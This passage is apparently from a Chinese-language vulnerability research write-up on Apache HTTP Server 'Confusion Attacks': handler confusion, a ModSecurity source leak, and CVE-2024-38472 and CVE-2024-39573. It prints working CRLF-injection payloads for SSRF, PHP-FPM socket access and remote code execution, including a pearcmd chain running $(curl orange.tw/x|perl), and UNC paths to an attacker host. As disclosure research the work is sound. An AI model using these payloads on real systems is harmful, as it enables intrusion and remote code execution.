而 Redmine 又是基於 Ruby on Rails 所開發的應用程式,其中 secret_key.txt 的內容其實正是其簽章加密所使用到的金鑰,接下來的流程相信對熟悉攻擊 RoR 的同學應該不陌生,透過已知的金鑰將惡意 Marshal 物件簽章加密後嵌入 Cookie,接著透過伺服器端的反序列化最終實現遠端程式碼執行!

🔥 3. Handler Confusion

最後一個要介紹的攻擊是 Handler 上的 Confusion。 這個攻擊同樣也利用了一個 Apache HTTP Server 從上古時期架構所遺留下來的技術債。這裡透過一個例子來讓讀者快速的了解這個技術債 —— 如果今天想在 Httpd 上運行經典的 mod_php,下面兩個語法設定你覺得哪個才是正確的?

AddHandler application/x-httpd-php .php
AddType    application/x-httpd-php .php

答案是 —— 兩個都可以正確地讓 PHP 運行起來! 這裡分別是兩個設定的語法格式,可以看到兩個設定不僅用法、參數類似,現在連效果都一模一樣,為什麼 Apache HTTP Server 當初要設計兩個不同的語法?

AddHandler handler-name extension [extension] ...
AddType media-type extension [extension] ...

實際上 handler-name 以及 media-type 在 Httpd 的內部結構中代表著不同的欄位,分別對應到 r->handler 以及 r->content_type。 而使用者可以在沒有感知的情況下使用則歸功於一段從 1996 年 Apache HTTP Server 開發初期就遺留到現在的程式碼

Path: server/config.c#L420

AP_CORE_DECLARE(int) ap_invoke_handler(request_rec *r) {

    // [...]

    if (!r->handler) {
        if (r->content_type) {
            handler = r->content_type;
            if ((p=ap_strchr_c(handler, ';')) != NULL) {
                char *new_handler = (char *)apr_pmemdup(r->pool, handler,
                                                        p - handler + 1);
                char *p2 = new_handler + (p - handler);
                handler = new_handler;

                /* exclude media type arguments */
                while (p2 > handler && p2[-1] == ' ')
                    --p2; /* strip trailing spaces */

                *p2='\0';
            }
        }
        else {
            handler = AP_DEFAULT_HANDLER_NAME;
        }

        r->handler = handler;
    }

    result = ap_run_handler(r);

可以看到在進入主要的模組處理器 ap_run_handler() 之前,如果請求中的 r->handler 為空則把結構中 r->content_type 欄位的內容當成最終將被使用的模組處理器。 這也就是為什麼 AddType 以及 AddHandler 效果一致的主要理由,因為 media-type 最終在執行前還是會被轉換成 handler-name。 我們的第三個 Handler Confusion 主要也就是圍繞在這個行為所發展出來的攻擊。

⚔️ Primitive 3-1. Overwrite the Handler

在理解這個轉換機制後首先第一個攻擊手法是 —— Overwrite the Handler,想像一下如果今天目標的 Apache HTTP Server 透過 AddType 將 PHP 運行起來。

AddType application/x-httpd-php  .php

在正常的流程中瀏覽 http://server/config.php。 首先,mod_mime 會在 type_checker 階段根據 AddType 所設定的附檔名將相對應的內容複製到 r->content_type 中,由於 r->handler 在整個 HTTP 生命週期中並無賦值,於是在執行模組處理器前 ap_invoke_handler() 會將 r->content_type 當成模組處理器,最終呼叫 mod_php 處理請求。

然而如果今天有任何模組在執行到 ap_invoke_handler() 前「不小心」把 r->content_type 覆寫掉了,那會發生什麼事呢?

✔️ 3-1-1. Overwrite Handler to Disclose PHP Source Code

因此這個攻擊手法的第一個利用就是透過這個「不小心」去洩漏任意 PHP 的原始碼。 這個技術最早是由 Max Dmitriev 在 ZeroNights 2021 所發表的研究中提及 (kudos to him!),演講主題及投影片可以從這邊看到:

Apache 0day bug, which still nobody knows of, and which was fixed accidentally

Max Dmitriev 觀察到只要送出錯誤的 Content-Length,遠端 Httpd 伺服器會發生不明的錯誤順帶回傳 PHP 的原始碼,在細追流程後發現其成因是 ModSecurity 在使用 APR (Apache Portable Runtime) 函示庫時並未好好的處理 AP_FILTER_ERROR 回傳值所導致的 double response。 由於發生錯誤時 Httpd 想送出一些 HTML 錯誤訊息,於是 r->content_type 也順便被覆寫成 text/html

由於 ModSecurity 並未妥善的處理回傳值使得本該停止的 Httpd 內部流程繼續執行,而這個「副作用」又會把原本加上的 Content-Type 給覆寫掉,導致最終該被當成 PHP 的檔案被當成一般文件處理並將其中的程式碼及敏感設定印出。 🤫

$ curl -v http://127.0.0.1/info.php -H "Content-Length: x"
> HTTP/1.1 400 Bad Request
> Date: Mon, 29 Jul 2024 05:32:23 GMT
> Server: Apache/2.4.41 (Ubuntu)
> Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
...
<?php phpinfo();?>

理論上所有基於 Content-Type 的設定語法都容易遭受此類問題影響,所以除了 Max 在投影片中所展示的 php-cgi 搭配 mod_actions 外,純粹的 mod_php 搭配上 AddType 也同樣也受影響。

另外值得一提的是,這個副作用在 Apache HTTP Server 版本 2.4.44 時被當成一個增進請求解析器的程式錯誤被更正,於是這個「漏洞」就被當成已修復直到我重新撿起它。 但由於其根本成因還是 ModSecurity 並未好好的處理錯誤,只要找到其它條觸發 AP_FILTER_ERROR 的路徑那同樣的行為還是可以重現成功。

P.S. 此問題已於 6/20 透過官方信箱回報給 ModSecurity 並由 Project Co-Leader 建議回到原 GitHub Issue 中討論。

✔️ 3-1-2. Overwrite Handler to ██████ ███████ ██████

基於前面提到的 double response 行為以及副作用,這個攻擊手法還可以完成其它更酷的利用,不過由於此問題尚未完全修復,更進一步的利用方式,將於修復完成後再揭露。

⚔️ Primitive 3-2. Invoke Arbitrary Handlers

仔細思考前面 Overwrite Handler 攻擊手法,雖然是因為 ModSecurity 並未好好的處理錯誤,導致請求被設置上錯誤的 Content-Type。 但再深入的探究其根本原因應該是 —— Apache HTTP Server 在使用 r->content_type 時,其實無從辨別它的語意,這個欄位既可以是在請求階段被語法設定好的值,也可以是回應階段伺服器回傳 Content-Type 標頭的內容。

所以理論上如果能控制伺服器回應中 Content-Type 標頭的內容,那就可以透過那段從開發初期遺留至今的程式碼呼叫任意的模組處理器,這也是 Handler Confusion 的最後一個攻擊手法 —— 呼叫任意 Apache HTTP Server 的內部模組處理器

但這裡還有最後的一塊拼圖必須填上,在 Httpd 中所有可以從伺服器回應修改到 r->content_type 的地方全都發生在那段遺留程式碼之後,就算修改到該欄位的內容,此時 HTTP 生命週期也進入尾聲,無法再做更進一步的利用…… 嗎?

我們找了 RFC 3875 來當救援投手! RFC 3875 是一個關於 CGI 的規範,其中 6.2.2. 節定義了一個 Local Redirect Response 行為:

The CGI script can return a URI path and query-string (‘local-pathquery’) for a local resource in a Location header field. This indicates to the server that it should reprocess the request using the path specified.

簡單來說規範了 CGI 在特定條件下必須使用伺服器端的資源去處理轉址,仔細檢視 mod_cgi 對於這個規範的實作會發現:

Path: modules/generators/mod_cgi.c#L983

    if ((ret = ap_scan_script_header_err_brigade_ex(r, bb, sbuf,          // <------ [1]
                                                    APLOG_MODULE_INDEX)))
    {
        ret = log_script(r, conf, ret, dbuf, sbuf, bb, script_err);

        // [...]

        if (ret == HTTP_NOT_MODIFIED) {
            r->status = ret;
            return OK;
        }

        return ret;
    }

    location = apr_table_get(r->headers_out, "Location");

    if (location && r->status == 200) {
        // [...]
    }

    if (location && location[0] == '/' && r->status == 200) {          // <------ [2]
        /* This redirect needs to be a GET no matter what the original
         * method was.
         */
        r->method = "GET";
        r->method_number = M_GET;

        /* We already read the message body (if any), so don't allow
         * the redirected request to think it has one.  We can ignore
         * Transfer-Encoding, since we used REQUEST_CHUNKED_ERROR.
         */
        apr_table_unset(r->headers_in, "Content-Length");

        ap_internal_redirect_handler(location, r);                     // <------ [3]
        return OK;
    }

首先 mod_cgi 會先執行[1] CGI 並掃描其輸出結果並設置上相對應的 Status 以及 Content-Type,如果[2]回傳的 Status 是 200 以及 Location 標頭欄位是 / 開頭則把這個回應當成一個伺服器端的轉址並開始處理[3]。 再仔細審視 ap_internal_redirect_handler() 的實作會發現:

Path: modules/http/http_request.c#L800

AP_DECLARE(void) ap_internal_redirect_handler(const char *new_uri, request_rec *r)
{
    int access_status;
    request_rec *new = internal_internal_redirect(new_uri, r);    // <------ [1]

    /* ap_die was already called, if an error occured */
    if (!new) {
        return;
    }

    if (r->handler)
        ap_set_content_type(new, r->content_type);                // <------ [2]
    access_status = ap_process_request_internal(new);             // <------ [3]
    if (access_status == OK) {
        access_status = ap_invoke_handler(new);                   // <------ [4]
    }
    ap_die(access_status, new);
}

Httpd 首先創建[1]了一個新的請求結構並將當前的 r->content_type[2]進去,在處[3]完生命週期後呼叫[4] ap_invoke_handler() —— 也就是前面提及包含歷史遺留轉換的地方,所以在伺服器端轉址中,如果可以控制回應標頭,就可以在 Httpd 中呼叫任意的模組處理器。 基本上所有 Apache HTTP Server 中的 CGI 系列實作都遵守這個行為,這裡是一個簡單的列表:

  • mod_cgi
  • mod_cgid
  • mod_wsgi
  • mod_uwsgi
  • mod_fastcgi
  • mod_perl
  • mod_asis
  • mod_fcgid
  • mod_proxy_scgi

至於如何在真實情境中觸發這個伺服器轉址呢? 由於至少需要控制 HTTP 回應中 Content-Type 及部分 Location,這裡給出兩個情境以供參考:

  1. 位於 CGI 回應標頭中的 CRLF Injection,透過換行去覆寫已存在的 HTTP 標頭
  2. 可完整控制回應標頭的 SSRF,例如託管在 mod_wsgi 上的 django-revproxy 專案

接下來的範例都基於這個不安全的 CRLF Injection 來做示範:

#!/usr/bin/perl 
 
use CGI;
my $q = CGI->new;
my $redir = $q->param("r");
if ($redir =~ m{^https?://}) {
    print "Location: $redir\n";
}
print "Content-Type: text/html\n\n";
✔️ 3-2-1. Arbitrary Handler to Information Disclosure

首先是從任意模組處理器呼叫到資訊洩漏,這裡使用了 Httpd 內建的 server-status 模組處理器,這個模組處理器通常只被允許從本機存取:

<Location /server-status>
    SetHandler server-status
    Require local
</Location>

在擁有任意模組處理器呼叫後,可以透過複寫 Content-Type 去存取原本存取不到的敏感資訊:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:server-status %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Misinterpret Scripts

當然也能輕鬆的把一張圖片轉化成 PHP 後門,例如當使用者上傳了一個擁有合法副檔名的檔案後,可以透過這個攻擊手法指定特定模組 mod_php 去執行檔案內嵌的惡意程式碼,例如:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/uploads/avatar.webp %0d%0a
Content-Type:application/x-httpd-php %0d%0a
%0d%0a

✔️ 3-2-2. Arbitrary Handler to Full SSRF

呼叫 mod_proxy 存取任何協議以及任意網址當然也不在話下,例如:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:http://example.com/%3f %0d%0a
%0d%0a

另外這也是一個可以完整控制 HTTP 請求還有取得所有 HTTP 回應的 SSRF! 稍微可惜的一點是在存取 Cloud Metadata 時會被 mod_proxy 會自動加上 X-Forwarded-For 標頭導致被 EC2 及 GCP 的 Metadata 保護機制阻擋,否則這會是一個更強大的攻擊手法。

✔️ 3-2-3. Arbitrary Handler to Access Local Unix Domain Socket

然而 mod_proxy 提供了一個更「方便」的功能 —— 可以存取本地的 Unix Domain Socket! 😉

這裡展示透過存取 PHP-FPM 本地的 Unix Domain Socket 去執行位於 /tmp/ 下的 PHP 後門:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/tmp/ooo.php %0d%0a
%0d%0a

這個手法理論上還存在著更多的可能性,例如協議走私 (在 HTTP/HTTPS 協議間走私 FastCGI 😏) 或其它易受影響的 Local Sockets 等,這都交給有興趣的人繼續研究了。

✔️ 3-2-4. Arbitrary Handler to RCE

最後來展示一下如何透過一個常見的 CTF 小技巧把這個攻擊手法轉化成 RCE! 由於 PHP 官方的 Docker 映像檔 在建構時引入了 PEAR 這套命令列 PHP 套件管理工具,透過其中的 Pearcmd.php 作為入口點可以讓我們達成更進一步的利用,詳細的歷史及原理可以參考由 Phith0n 撰寫的 Docker PHP LFI 總結文

這裡我們利用在 run-tests 內的 Command Injection 來完成整個攻擊鏈,詳細的攻擊鏈如下:

http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php/pearcmd.php %0d%0a
%0d%0a

網路上經常在 Security Advisory 或 Bug Bounty 看到把 CRLF Injection 或 Header Injection 當成 XSS 報告,雖然確實有機會透過 SSO 串出 Account Takeover 等精彩漏洞,但請不要忘了它也能串出 Server-Side RCE,這個示範證明了它的可能!

🔥 4. 其它漏洞

基本上整個 Confusion Attacks 系列到這邊差不多告一個段落,然而在研究 Apache HTTP Server 的過程中還有些值得一提的漏洞因此將它們獨立出來。

⚔️ CVE-2024-38472 - 基於 Windows UNC 的 SSRF

首先是 apr_filepath_merge() 函數在 Windows 的實作允許使用 UNC 路徑,下面提供兩種不同的觸發路徑讓攻擊者可以向任意主機發起 NTLM 認證:

✔️ 透過 HTTP 請求解析器觸發

想要直接透過 HTTP 請求觸發需要在 Httpd 中設置額外的設定,雖然這個設定第一眼看起來有點不現實,但似乎經常與 Tomcat (mod_jkmod_proxy_ajp) 或是與 PATH_INFO 一起出現:

AllowEncodedSlashes On

另外由於 Httpd 在 2.4.49 後重寫了核心 HTTP 請求解析器邏輯,要在大於此版本的 Httpd 上觸發漏洞需要再額外加上一個設定:

AllowEncodedSlashes On
MergeSlashes Off

透過兩個 %5C 可以使強迫 Httpd 向 attacker-server 發起 NTLM 認證,實務上也可透過 NTLM Relay 的方式將此 SSRF 轉化成 RCE!

$ curl http://server/%5C%5Cattacker-server/path/to

✔️ 透過 Type-Map 觸發

Debian/Ubuntu 的 Httpd 發行版中預設啟用了 Type-Map:

AddHandler type-map var

透過上傳一個 .var 檔案到伺服器,將其中 URI 欄位指定成 UNC 路徑也可強迫伺服器向攻擊者發起 NTLM 認證,這也是我所提出的第二個 .var 小技巧 😉

⚔️ CVE-2024-39573 - 基於 RewriteRule 前綴可完全控制的 SSRF

最後則是當位於 Server Config 或是 VirtualHost 中的 RewriteRule 前綴完全可控時,可以呼叫到 Proxy 以及相關子模組:

RewriteRule ^/broken(.*) $1

透過下列網址可將請求轉交給 mod_proxy 處理:

$ curl http://server/brokenproxy:unix:/run/[...]|http://path/to

但如果網管有好好測試,就會發現這樣子的規則是不實際的,所以原本只把它當成另外一個漏洞的搭配組合一起回報,沒想到這個行為也被當成一個安全邊界修復。 再隨著修補出來後也看到其他研究員把同樣行為套用在 Windows UNC 上獲得另外一個額外的 CVE。

未來研究方向

最後是關於這份研究的未來的一些展望以及可加強的地方,基本上 Confusion Attacks 仍然是一個很有潛力的攻擊面,尤其是我這次的研究主要也只專注在兩個欄位上而已,只要 Apache HTTP Server 沒有好好從底層進行結構性加強或提供給開發者一個好的開發標準,相信未來還會有更多「混淆」出現!

至於還有哪些方面可以加強呢? 其實不同的 Httpd 發行版會有不同的設定檔案,因此其它的 Unix-Like 系統例如 RHEL 家族、BSD 系列,甚至使用到 Httpd 的套裝軟體,它們都有機會出現更多可跳脫的重寫規則、更多厲害的 Local Gadgets 甚至意料外的符號跳躍等等 ,就交給有興趣的人繼續吧。

最後由於時程因素,來不及分享更多在實際網站、設備,甚至開源專案上發現並利用的真實案例,不過你應該已經可以想像 —— 在真實世界中絕對還藏著千千萬萬個比想像中還要大量未開採的規則、可繞過的認證,以及隱藏在檯面下的 CGI,至於如何把這篇裡面所講到的技巧實際應用在全世界上? 接下來就是你們的任務了!

結語

維護一個 Open Source 專案真的是一件很困難的事,尤其在讓使用者方便的同時兼顧舊版本的相容性,稍有不慎可能就會造成整個系統被攻破 (例如 Httpd 2.4.49 中因為一個路徑處理邏輯小改動導致災難性的 CVE-2021-41773),整個開發過程必須要小心翼翼的踩在一堆遺留程式碼以及技術債上。 所以如果真的有 Apache HTTP Server 的開發者看到這篇文我想說: 謝謝你們的貢獻!